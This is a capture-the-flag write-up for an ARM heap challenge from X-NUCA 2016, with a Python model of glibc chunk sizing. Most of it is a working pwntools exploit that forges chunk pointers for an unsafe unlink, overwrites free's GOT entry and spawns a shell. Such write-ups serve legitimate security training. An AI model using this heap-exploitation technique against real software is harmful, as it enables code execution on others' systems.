arm_double_free_attack

The challenge is the note task from X-NUCA 2016. All the challenge files can be downloaded from my github.

A simple heap-overflow challenge, but the environment is ARM, and there are a few small traps: for instance, a 0x200 chunk does not work here and only a 0x100 chunk will do; 0x200 apparently already turns into a large chunk. Sure enough, someone with weak fundamentals cannot survive here...
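As an added example (not part of the original write-up or its exploit), the following models glibc's request-to-chunk-size rounding and its fast/small/large bin boundaries, which is why a 0x200 request is already a large chunk on 32-bit ARM while the same request is still a small chunk on 64-bit. The constants assume glibc 2.25 or older with MALLOC_ALIGNMENT = 2*SIZE_SZ, which is what the ARM32 target here is taken to use.

```python
# Added example: model of glibc malloc.c sizing macros (glibc <= 2.25 assumed,
# MALLOC_ALIGNMENT == 2*SIZE_SZ as on 32-bit ARM and x86_64 of that era).

def malloc_params(bits):
    """Return (SIZE_SZ, MALLOC_ALIGNMENT, MINSIZE, MIN_LARGE_SIZE, max_fast)."""
    size_sz = bits // 8
    align = 2 * size_sz                      # MALLOC_ALIGNMENT
    minsize = 4 * size_sz                    # prev_size, size, fd, bk
    min_large = 64 * align                   # NSMALLBINS * SMALLBIN_WIDTH
    mask = align - 1
    # set_max_fast(DEFAULT_MXFAST): DEFAULT_MXFAST = 64 * SIZE_SZ / 4
    max_fast = (64 * size_sz // 4 + size_sz) & ~mask
    return size_sz, align, minsize, min_large, max_fast


def request2size(req, bits=32):
    """glibc's request2size(): add the size field, round up to the alignment."""
    size_sz, align, minsize, _, _ = malloc_params(bits)
    mask = align - 1
    if req + size_sz + mask < minsize:
        return minsize
    return (req + size_sz + mask) & ~mask


def bin_class(req, bits=32):
    """Which bin a freed (non-top, non-consolidated) chunk of this request uses."""
    _, _, _, min_large, max_fast = malloc_params(bits)
    size = request2size(req, bits)
    if size <= max_fast:
        return "fast"
    return "small" if size < min_large else "large"


if __name__ == "__main__":
    # 0x100 -> chunk 0x108 (matches the p32(0x108) size field in the exploit),
    # 0x200 -> chunk 0x208, which is >= MIN_LARGE_SIZE (0x200) on 32-bit only.
    for req in (0, 0x100, 0x1F4, 0x200):
        print("req=%#x  arm32 chunk=%#x (%s)  x86_64 chunk=%#x (%s)" % (
            req, request2size(req, 32), bin_class(req, 32),
            request2size(req, 64), bin_class(req, 64)))
```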

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2017-04-09 08:34:41
# @Author : WinterSun (511683586@qq.com)
# @Link : https://Winter3un.github.io/
# import roputils
from pwn import *
context(log_level="debug")
DEBUG = 1
target = "./note"
remote_ip = ""
port = 0
# rop = roputils.ROP(target)
# bss = rop.section('.bss')
# rop.got('puts')
# msfvenom -p linux/x86/exec CMD=/bin/sh -f python -b '\x00\x0b\x0d\x0a'
if DEBUG:
    p = process(target)
    # gdb.attach(p,"b*main\nc")
else:
    p = remote(remote_ip, port)

def sl(data):
    p.sendline(data)

def sd(data):
    p.send(data)

def ru(data):
    return p.recvuntil(data)

# menu wrappers: 1 = add a note, 2 = delete a note, 5 = edit a note
def add(length, data):
    ru("6. Exit")
    sl("1")
    # raw_input()
    ru("\n")
    sl(str(length))
    ru("\n")
    sl(data)

def dele(index):
    ru("6. Exit")
    sl("2")
    ru("the id:")
    sl(str(index))

def edit(index, data):
    ru("6. Exit")
    sl("5")
    ru("\n")
    sl(str(index))
    ru("\n")
    sl(data)

def edit_anyaddr(addr, data):
    # point note 0's buffer at addr through note 1, then write data there
    edit(1, p32(0) + p32(addr))
    edit(0, data)

# stage 1 unlink
add(0, "a" * 0x8)          # 0
add(0x100, "aaa")          # 1  requests >= 0x200 would use a large chunk
add(0x100, "aaa")          # 2
add(0x100, "/bin/sh\x00")  # 3
junk = "\x00" * 8
head = p32(0) * 2
fake_head = p32(0) + p32(0x101)
fd = p32(0x1205C + 0x8 - 0xc)
bk = p32(0x1205C + 0x8 - 0x8)
payload = junk + head
payload += fake_head + fd + bk
payload += "a" * (0x100 - len(fake_head + fd + bk))
payload += p32(0x100) + p32(0x108)
edit(0, payload)
raw_input()
dele(2)
# stage 2 edit free_got
# the trailing NUL from sendline overflows by one byte and clobbers the next GOT entry
edit_anyaddr(0x12024, p32(0x8538)[:-1])
dele(3)
p.interactive()
